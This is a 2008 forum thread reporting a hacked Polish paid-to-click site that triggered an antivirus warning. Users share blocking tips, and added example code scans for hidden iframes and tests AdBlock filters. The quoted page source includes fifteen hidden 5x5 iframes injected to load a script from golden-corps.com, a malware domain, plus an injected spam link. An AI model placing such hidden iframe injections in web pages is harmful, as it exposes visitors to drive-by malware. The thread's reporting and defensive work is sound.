Full Version: Pol-bux = AV Warning: Exploit Neosploit
longshanks1971
Source code URL: hxxp://www.pol-bux.cxm/index.php?ref=xx

AV warning of Exploit Neosploit and there are multiple golden corps 5x5 iframes which could be the source of the threat.

Extracted code;
CODE
<iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>


Complete code;
CODE
<a href="http://sepsis.ge/nordea-bank.html">nordea bank</a><html>
  <head>
  <title>Pol-Bux.com : Welcome To Pol-Bux.com!</title>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  <LINK href="favicon.ico" rel="icon">
  <link rel='stylesheet' href='style.css' type='text/css'>
  <script language="JavaScript" src="menu.js"></script>
  </head>
  <body>
  <table border="0" width="100%" cellspacing="0" cellpadding="0" height="100%" background="images/tlo.png">
  <tr><td height="120">
  <table border="0" width="100%" cellspacing="0" cellpadding="0" height="120" background="images/gora.png">
  <tr><td><img border="0" src="images/gora_logo.png" width="327" height="120"></td>
  <td align="right">
  <table border="0" width=486 cellspacing="0" cellpadding="0" height="120">
  <tr><td background="images/gora_baner.png" width="486" style="padding-bottom: 20px; padding-left:9px; padding-right:9px" valign="bottom"><a href="bannerclick.php?id=87" target="_blank"><img src="http://www.goodemails.com/banners/banner1.gif" border=0" width="468" height="60"></a></td></tr>
  </table>
  </td></tr>
  </table>
  </td></tr>
  <tr><td style="padding-top:10px" height="50">
  <table cellpadding=0 cellspacing=0 width="100%">
  <tr><td align="center" class="menu" height="46"><div id='left2'></div><div id='right2'></div><div class="odstep">
  <a href="index.php?view=home&ref=Ibad786&" title="Welcome Page">Home</a>&nbsp;&nbsp;&nbsp;&nbsp;
  <a href="index.php?view=news&ref=Ibad786&" title="News About Site">News</a>&nbsp;&nbsp;&nbsp;&nbsp;
  <a href="index.php?view=prices&ref=Ibad786&" title="Prices For Advertising Space">Prices</a>&nbsp;&nbsp;&nbsp;&nbsp;
  
  <a href="index.php?view=join" title="Join For Free!">Join</a>&nbsp;&nbsp;&nbsp;&nbsp;
  <a href="index.php?view=help&ref=Ibad786&" title="FAQ's To Help You Use Our Site">Help</a>&nbsp;&nbsp;&nbsp;&nbsp;
  <a href="index.php?view=terms&ref=Ibad786&" title="Terms For Our Site">Terms</a>&nbsp;&nbsp;&nbsp;&nbsp;
  <a href="index.php?view=payouts&ref=Ibad786&" title="Payments Proof">Payouts</a>&nbsp;&nbsp;&nbsp;&nbsp;
  <a href="index.php?view=contact&ref=Ibad786&" title="Contact Us With Any Comments/Suggestions">Contact</a>
  </div></td>
  </tr>
  
  
  </table>
  </td></tr>
  <tr><td valign="top">
  <table border="0" width="100%" cellspacing="5" cellpadding="0">
  <tr><td valign="top" width="15%">
  <table border="0" width="200" cellspacing="0" cellpadding="0">
  <tr><td>
  
  <div id='menu'><div id='tlo'><div id='left'></div><div id='right'></div>Log In</div>                
      <div id='tekst'>
      <h3>
      <div align=center style="padding:10px"><input type="button" value="Click Here To Log In" onclick="location.href='index.php?view=login&'" style="width:160"></div>
      </h3>
      </div>
  </div>
  </td></tr>
  <tr><td height=5></td></tr>
  <tr><td>
  <div id='menu'><div id='tlo'><div id='left'></div><div id='right'></div>Featured Ad</div>                
      <div id='tekst'>
      <h3>
      <b><a href="fadclick.php?id=71">Only The Best PTC</a></b><br><font style="font-size:9pt">trusted and paid me!!!</font>
      </h3>
      </div>
  </div>
  
  </td></tr>
  <tr><td height="5"></td></tr>
  <tr><td>
  <div id='menu'><div id='tlo'><div id='left'></div><div id='right'></div>Featured Links</div>                
      <div id='tekst'>
      <h3>
      <a href="flinkclick.php?id=8" target="_blank">POL-PTC.net - Promotion !!!</a><img src=images/okienko_belka_miedzy_reklamami.png width=100% height=2><b><a href="index.php?view=prices"><marquee scrollamount=3 scrolldelay=1><font color=#2A2A2A>Advertise Here</font></marquee></a></b>
      </h3>
      </div>
  </div>
  
  </td></tr>
  </table>
  </td>
  <td valign="top" width="70%">
  <div id='menu'><div id='tlo'><div id='left'></div><div id='right'></div>Welcome To Pol-Bux.com!</div>                
      <div id='tekst'>
      <h3>
      
  <div align="center">
  <br><a href="http://www.pol-bux.com/ptc"><img border=0 src=images/only_the_best_ptc.gif></a><br></b>
  <div align="center">
  <div align="center">
  <br><b><big><font color=black>Members</font></big></b><br>
  <table width="80%">
      <tr>
          <td>
  <b><ul type='square'>
  <li>Since 01-02-2008 Site is ads only
  <li>Free To Join
  <li>0,1 to 0,5 Cent Per Click
  <li>Links To Signup Featured
  <li>20% for Referral
  <li>No Limit On Earnings
  <li>Convert cash to ads than 4 cents
  </ul></b>
          </td>
          <td>
              <img src="images/members.png">
          </td>
      </tr>
  </table>
  
  <br><br>
  
  <b><big><font color=black>Advertisers</font></big></b><br>
  <table width="80%">
      <tr>
          <td>
              <img src="images/advertisers.png" align="left">
          </td>
          <td>
  <b><li>Daily Unique Hits
  <li>Instant Ad Activation
  <li>Easy To Use Purchasing Wizard
  <li>Low cost - Quality advertising
  <li>24/7 Live Stats
  <li>Paypal Payments</b>
          </td>
      </tr>
  </table>
  
  
  <br>
  
  <b><font style="font-size: 18pt;"><a href="index.php?view=join&ref=Ibad786&">Join Now</a></font></b><br>
  
  </div>
  
      </h3>
      </div>
  </div>
  
  </td>
  <td valign="top" width="15%">
  <table border="0" width="190" cellspacing="0" cellpadding="0">
  <tr><td>
  <div id='menu'><div id='tlo'><div id='left'></div><div id='right'></div>Todays Top 15</div>                
      <div id='tekst'>
      <h3>
      1. admin (0)<br>2. michalo125 (0)<br>3. kapiszon (0)<br>4. miirap (0)<br>5. black (0)<br>6. emobbs (0)<br>7. yby7895 (0)<br>8. am999 (0)<br>9. Faldegort (0)<br>10. enrico74 (0)<br>11. dusty (0)<br>12. stob (0)<br>13. wgwgg (0)<br>14. amanarora2402 (0)<br>15. havebehere (0)<br>
      </h3>
      </div>
  </div>
  
  </td></tr><tr><td height=5></td></tr><tr><td>
  <div id='menu'><div id='tlo'><div id='left'></div><div id='right'></div>Site Stats</div>                
      <div id='tekst'>
      <h3>
      Members: 4151<img src=images/okienko_belka_miedzy_reklamami.png width=100% height=2>
  New Today: 0<img src=images/okienko_belka_miedzy_reklamami.png width=100% height=2>
  Hits Today: 230<img src=images/okienko_belka_miedzy_reklamami.png width=100% height=2>
  Online: 1
      </h3>
      </div>
  </div>
  
  </td></tr>
  </table>
  </td></tr>
  </table>
  </td></tr>
  <tr><td height="127" valign="bottom">
  <table border="0" width="100%" cellspacing="0" cellpadding="0" background="images/dol.png" height="127">
  <tr><td>&nbsp;</td>
  <td align="center" background="images/dol_baner.png" width="600" style="padding-bottom:22px" valign="bottom">
  <p style="line-height:300%">
  <b><div class=stopka>Copyright © 2008 Pol-Bux.com - All rights reserved |
  Script Modify: <a href="http://www.kapiszon.net/">Kapiszon</a> |
  Design: <a href="http://www.pol-bux.com/ptc">Helloman</a></div></font></b>
  <!-- Begin BidVertiser code -->
  <script LANGUAGE="JavaScript1.1" SRC="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=85888&bid=202894" type="text/javascript"></SCRIPT>
  <noscript><a href="http://www.bidvertiser.com">marketing</a></noscript>
  <!-- End BidVertiser code --></td>
  <td>&nbsp;</td></tr>
  </table>
  </td></tr>
  </table>
  </body>
  </html><iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>


Reported via contact link

Edited to add, can't stop the auto searches loading long enough to get the contact page displayed
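A way to check a saved page for the pattern reported above, added here as an example and not part of the original post: it flags iframes that are hidden by CSS or only a few pixels in size, and links, iframes or scripts that sit outside `<html>…</html>`, which is where the quoted page carries both its leading link and the iframes. The sample markup is constructed from the quoted source; the names `InjectionScanner`, `scan` and `tiny` and the 10-pixel limit are assumptions of this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample, modelled on the markup quoted in the post above.
IFRAME = ('<iframe name="StatPage" src="http://golden-corps.com/script.php" '
          'width=5 height=5 style="display:none"></iframe>\n')
SAMPLE = ('<a href="http://sepsis.ge/nordea-bank.html">nordea bank</a><html><body>'
          '<iframe src="/widget.html" width="300" height="250"></iframe>'
          '</body></html>' + IFRAME * 2)

def tiny(value, limit=10):
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= limit

class InjectionScanner(HTMLParser):
    WATCHED = {"a", "iframe", "script"}  # tags that can pull in remote content
    def __init__(self):
        super().__init__()
        self.html_open = self.html_closed = False
        self.findings = []  # (tag, host, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag == "html":
            self.html_open = True
            return
        a, reasons = dict(attrs), []
        if tag in self.WATCHED and not self.html_open:
            reasons.append("before <html>")
        if tag in self.WATCHED and self.html_closed:
            reasons.append("after </html>")
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            if "display:none" in style or "visibility:hidden" in style:
                reasons.append("hidden by CSS")
            if tiny(a.get("width")) and tiny(a.get("height")):
                reasons.append("tiny frame")
        if reasons:
            host = urlparse(a.get("src") or a.get("href") or "").hostname or ""
            self.findings.append((tag, host, reasons))

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True

def scan(html):
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```

`scan(SAMPLE)` returns one finding for the link placed before `<html>` and one per trailing iframe, while the normally sized iframe inside the body is not reported.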
wagdoll
QUOTE (longshanks1971 @ Aug 14 2008, 02:16 PM) *
Source code URL: hxxp://www.pol-bux.cxm/index.php?ref=xx

AV warning of Exploit Neosploit and there are multiple golden corps 5x5 iframes which could be the source of the threat.

Reported via contact link

Edited to add, can't stop the auto searches loading long enough to get the contact page displayed


Yes, http:// golden-corps.com is a known malware domain that is hacked onto websites by malware groups to spread viruses.

As soon as you come across one like this and find the domain responsible - like in this case it's the golden corps - put it in adblock by breaking it down to the base domain (golden-corps.com) and leaving the rest of the URL off, I also put them inside asterisks when I break a URL in this way (*golden-corps.com*) and leave off the http://www

Once you've done that you should stop getting the virus alerts and you'll be able to get into the contact page. Then if you come across that again it will show up in red in the adblock list. You can make a note of the URLs you add in a notebook to remind you of the reason you added something to adblock, eg autosearches, viruses etc because after a few months of doing this the adblock list can get very long and hard to remember why you added each domain

HTH
longshanks1971
That did help wagdoll, thank you very much. By following your advice I was able to get the site loaded, however every link on that site, contact - faq etc only loads the homepage, whether this is related to the problem I'm not sure. But, and I don't know why I didn't think to do it before, I managed to get an email address from the whois and have sent a mail alerting them to the problem.

Thanks for the advice about adblock and how to remember what is for what, that's very useful info and will certainly help me and, I'm sure, will help others as well.

Take care,

Craig
jlandis
QUOTE (wagdoll @ Aug 25 2008, 06:50 AM) *
... put it in adblock by breaking it down to the base domain (golden-corps.com) and leaving the rest of the URL off, I also put them inside asterisks when I break a URL in this way (*golden-corps.com*) and leave off the http://www


Wagdoll's advice here is critically important, because if you leave the "http://www" at the beginning of a malware domain entry and then later hit an URL on that domain that's been coded without the "www", you won't be protected. Likewise, if you've only entered it with "http://" you're exposed when you hit a version coded with the "www".

QUOTE (wagdoll @ Aug 25 2008, 06:50 AM) *
You can make a note of the URLs you add in a notebook to remind you of the reason you added something to adblock, eg autosearches, viruses etc because after a few months of doing this the adblock list can get very long and hard to remember why you added each domain


I've developed a quick shorthand for this that might be useful. Since asterisks aren't necessary when AdBlocking an entire domain, you can use asterisks to tell you at a glance whether the domain you're blocking carries fraud or malware.

When entering a domain because it carries fraudulent frames or scripts (things that hurt others), enter the domain followed by an asterisk: domain.com*

When entering a domain that carries a virus or other malware (things trying to hurt you directly), enter an asterisk before the domain: *domain.com

Then you can enter domains you're blocking for other reasons without any asterisks.

This way when you see an URL in your AdBlock list lit up in red, you can see quickly if there's an asterisk before or after it in the Filter column, which alerts you to fraud or danger that needs reporting.
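The effect of the scheme and "www" prefix described in the posts above, shown as an added example that is not part of the thread: it uses a simplified model of substring filter matching (an assumption, not AdBlock's own code) in which `*` matches any run of characters and a filter matches anywhere in the URL. The URL variants and the `example.test` address are constructed for illustration.

```python
import re

def filter_to_regex(flt):
    # Simplified model (assumption): an unanchored filter matches anywhere
    # in the URL, and '*' stands for any run of characters.
    return re.compile(".*".join(re.escape(p) for p in flt.split("*")), re.I)

def blocks(flt, url):
    return filter_to_regex(flt).search(url) is not None

def missed(flt, urls):
    """URLs on the blocked domain that the filter fails to catch."""
    return [u for u in urls if not blocks(flt, u)]

# Constructed URL variants of the domain named in the thread.
VARIANTS = [
    "http://golden-corps.com/script.php",
    "http://www.golden-corps.com/script.php",
    "https://golden-corps.com/script.php",
    "http://stats.golden-corps.com/script.php",
]
# Constructed URL on an unrelated host that merely mentions the domain.
UNRELATED = "http://example.test/out.php?to=golden-corps.com"

def report(filters):
    """Map each filter to (variants missed, whether UNRELATED is also blocked)."""
    return {f: (len(missed(f, VARIANTS)), blocks(f, UNRELATED)) for f in filters}

if __name__ == "__main__":
    for flt, (gaps, over) in report([
        "http://www.golden-corps.com",
        "http://golden-corps.com",
        "golden-corps.com",
        "*golden-corps.com",
        "golden-corps.com*",
    ]).items():
        print(f"{flt:32} missed={gaps} also_blocks_unrelated={over}")
```

Under this model the two prefixed filters each miss three of the four variants, the bare domain and both asterisk-marked forms miss none, and the bare forms also match an unrelated URL that only carries the domain in its query string.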
longshanks1971
Thanks very much for that advice as well, it does make things simpler.

I received a reply today but unfortunately it was in a language that on-line translators could deal with - Polish at a guess, so I don't know what they are doing about it or even if they understand my email as it was sent in English. Just tried it again and it's all still there but I did direct them to this thread so maybe something will be done.

Thanks again for the advice both of you, it will help a lot of other people as well as me.

Take care,

Craig
SaraM
I get so mad that people pull this kind of stuff. I am glad I found this forum so that I can know what's legit beforehand
jlandis
QUOTE (longshanks1971 @ Aug 26 2008, 11:43 AM) *
Thanks again for the advice both of you, it will help a lot of other people as well as me.


That's kind of you. Thanks for your reports and followup. You're helping equip people to prevent a lot of harm.

QUOTE (SaraM @ Aug 26 2008, 04:04 PM) *
I get so mad that people pull this kind of stuff. I am glad I found this forum so that I can know what's legit beforehand


Me too SaraM. Welcome!